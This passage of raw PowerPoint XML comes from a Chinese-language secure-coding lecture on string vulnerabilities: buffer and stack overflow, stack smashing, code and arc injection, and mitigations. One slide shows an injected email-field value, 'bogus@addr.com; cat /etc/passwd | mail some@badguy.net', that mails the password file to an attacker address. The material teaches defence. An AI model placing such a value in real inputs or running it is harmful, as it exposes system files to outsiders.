              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>bogus@addr.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>; cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>/passwd  | mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>some@badguy.net</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1500" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New"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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1436096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99592" y="332656"/>
            <a:ext cx="7543800" cy="1295400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1988840"/>
            <a:ext cx="7924800" cy="4123928"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字符串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>常见的字符串操作错误</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字符串漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>缓冲区溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>栈溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>栈粉碎</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>代码注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>弧注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>缓解措施</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="灯片编号占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D21C09B4-D851-4043-BACE-08EB012A6BE7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1622221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latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>缓冲区溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>栈溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>当向为某特定数据结构分配的内存空间边界之外写入数据时，就会发生缓冲区溢出。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>缓冲区边界被忽视和不检查造成的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>可通过修改下列参数来利用缓冲区溢出：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>变量</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>数据指针</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>函数指针</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>栈返回地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3662093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dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>缓冲区溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1001985" y="1927741"/>
            <a:ext cx="8145463" cy="925195"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>当向为某特定数据结构分配的内存空间边界之外写入数据时， 就会发生缓冲区溢出。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33796" name="Group 63"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="157163" y="3048000"/>
            <a:ext cx="8475662" cy="3378200"/>
            <a:chOff x="210" y="1895"/>
            <a:chExt cx="5339" cy="2128"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33797" name="Line 64"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1132" y="2688"/>
              <a:ext cx="0" cy="432"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">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33798" name="Text Box 65"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="210" y="2991"/>
              <a:ext cx="70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zh-CN" altLang="en-US" sz="1800">
                  <a:cs typeface="宋体" charset="0"/>
                </a:rPr>
                <a:t>目标内存</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:cs typeface="宋体" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33799" name="Text Box 66"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="299" y="2344"/>
              <a:ext cx="55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zh-CN" altLang="en-US" sz="1800">
                  <a:cs typeface="宋体" charset="0"/>
                </a:rPr>
                <a:t>源内存</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:cs typeface="宋体" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33800" name="AutoShape 67"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="-5400000">
              <a:off x="4200" y="3096"/>
              <a:ext cx="336" cy="960"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 23810"/>
                <a:gd name="adj2" fmla="val 50204"/>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cs typeface="宋体" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33801" name="AutoShape 68"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="-5400000">
              <a:off x="2268" y="2148"/>
              <a:ext cx="360" cy="2880"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 66667"/>
                <a:gd name="adj2" fmla="val 50000"/>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cs typeface="宋体" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33802" name="Text Box 69"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1514" y="3792"/>
              <a:ext cx="1295"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zh-CN" altLang="en-US" sz="1600">
                  <a:cs typeface="宋体" charset="0"/>
                </a:rPr>
                <a:t>分配的内存</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                  <a:cs typeface="宋体" charset="0"/>
                </a:rPr>
                <a:t>(12 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                  <a:cs typeface="宋体" charset="0"/>
                </a:rPr>
                <a:t>字节</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                  <a:cs typeface="宋体" charset="0"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33803" name="Text Box 70"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3878" y="3810"/>
              <a:ext cx="637"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zh-CN" altLang="en-US" sz="1600">
                  <a:cs typeface="宋体" charset="0"/>
                </a:rPr>
                <a:t>其他内存</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:cs typeface="宋体" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33804" name="AutoShape 71"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="2784" y="336"/>
              <a:ext cx="288" cy="3840"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 111111"/>
                <a:gd name="adj2" fmla="val 49995"/>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cs typeface="宋体" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33805" name="Text Box 72"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2372" y="1895"/>
              <a:ext cx="111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600">
                  <a:cs typeface="宋体" charset="0"/>
                </a:rPr>
                <a:t>16 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                  <a:cs typeface="宋体" charset="0"/>
                </a:rPr>
                <a:t>字节数据</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:cs typeface="宋体" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33806" name="Text Box 73"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4847" y="2700"/>
              <a:ext cx="70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zh-CN" altLang="en-US" sz="1800">
                  <a:cs typeface="宋体" charset="0"/>
                </a:rPr>
                <a:t>复制操作</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:cs typeface="宋体" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33807" name="Rectangle 74"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1008" y="2448"/>
              <a:ext cx="240" cy="240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00FF00"/>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08" name="Rectangle 75"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1248" y="2448"/>
              <a:ext cx="240" cy="240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00FF00"/>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09" name="Rectangle 76"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1488" y="2448"/>
              <a:ext cx="240" cy="240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00FF00"/>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10" name="Rectangle 77"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1728" y="2448"/>
              <a:ext cx="240" cy="240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00FF00"/>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11" name="Rectangle 78"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1968" y="2448"/>
              <a:ext cx="240" cy="240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00FF00"/>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12" name="Rectangle 79"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2208" y="2448"/>
              <a:ext cx="240" cy="240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00FF00"/>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13" name="Rectangle 80"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="2448"/>
              <a:ext cx="240" cy="240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00FF00"/>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14" name="Rectangle 81"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2688" y="2448"/>
              <a:ext cx="240" cy="240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00FF00"/>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15" name="Rectangle 82"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2928" y="2448"/>
              <a:ext cx="240" cy="240"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00FF00"/>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16" name="Rectangle 83"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3168" y="2448"/>
              <a:ext cx="240" cy="240"/>
